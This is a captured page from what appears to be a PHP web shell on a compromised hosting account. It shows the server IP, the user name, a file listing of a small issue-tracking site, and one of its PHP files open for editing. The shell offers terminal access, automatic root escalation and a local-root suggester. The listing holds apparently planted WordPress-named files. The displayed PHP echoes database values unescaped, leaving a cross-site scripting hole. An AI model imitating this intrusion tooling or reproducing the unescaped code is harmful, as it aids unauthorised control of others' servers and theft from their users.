Linux spg1.cloudpowerdns.com 5.14.0-611.34.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Feb 18 05:51:10 EST 2026 x86_64
LiteSpeed
Server IP : 176.9.63.151 & Your IP : 216.73.217.60
Domains :
Cant Read [ /etc/named.conf ]
User : fastear1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
fastear1 /
game 61 clube /
contact /
Delete
Unzip
Name
Size
Permission
Date
Action
.htaccess
197
B
-r--r--r--
2026-04-01 03:43
Pending_issues.php
1.88
KB
-rw-r--r--
2025-03-26 22:47
dashboard.php
2.08
KB
-rw-r--r--
2025-11-08 23:39
db_connection.php
394
B
-rw-r--r--
2025-11-21 17:38
error_log
16.83
KB
-rw-r--r--
2025-03-26 22:47
index.html
1.55
KB
-rw-r--r--
2025-03-26 22:47
index.php
3.33
KB
-rw-r--r--
2025-03-26 22:47
reply_issue.php
1.01
KB
-rw-r--r--
2025-03-26 22:47
styles.css
1.02
KB
-rw-r--r--
2025-03-26 22:47
upload_file.php
934
B
-rw-r--r--
2025-03-26 22:47
view_issue.php
3.44
KB
-rw-r--r--
2025-03-26 22:47
view_issues.php
1.88
KB
-rw-r--r--
2025-03-26 22:47
wp-blog-header.php
2.74
KB
-r--r--r--
2026-04-01 03:43
wp-cron.php
2.74
KB
-rw-r--r--
2026-04-01 03:43
Save
Rename
<?php // Start session to check if the user is logged in session_start(); // Check if the admin is logged in, if not redirect to login page if (!isset($_SESSION['admin_id'])) { header('Location: index.php'); // Redirect to login page if not logged in exit(); } // Admin ID stored in session $admin_id = $_SESSION['admin_id']; // Rest of your code for viewing issue details... require 'db_connection.php'; $query = "SELECT * FROM issues ORDER BY created_at DESC"; $stmt = $pdo->query($query); $issues = $stmt->fetchAll(); ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>View Issues</title> <link rel="stylesheet" href="styles.css"> </head> <body> <div class="sidebar"> <ul> <li><a href="dashboard.php">Dashboard</a></li> <li><a href="view_issues.php">View Issues</a></li> </ul> </div> <div class="content"> <h1>View All Issues</h1> <table> <thead> <tr> <th>Issue ID</th> <th>Account ID</th> <th>Issue</th> <th>Status</th> <th>Actions</th> </tr> </thead> <tbody> <?php foreach ($issues as $issue): ?> <tr> <td><?php echo $issue['id']; ?></td> <td><?php echo $issue['account_id']; ?></td> <td><?php echo $issue['issue']; ?></td> <td><?php echo $issue['status']; ?></td> <td><a href="view_issue.php?id=<?php echo $issue['id']; ?>">View</a></td> </tr> <?php endforeach; ?> </tbody> </table> </div> </body> </html>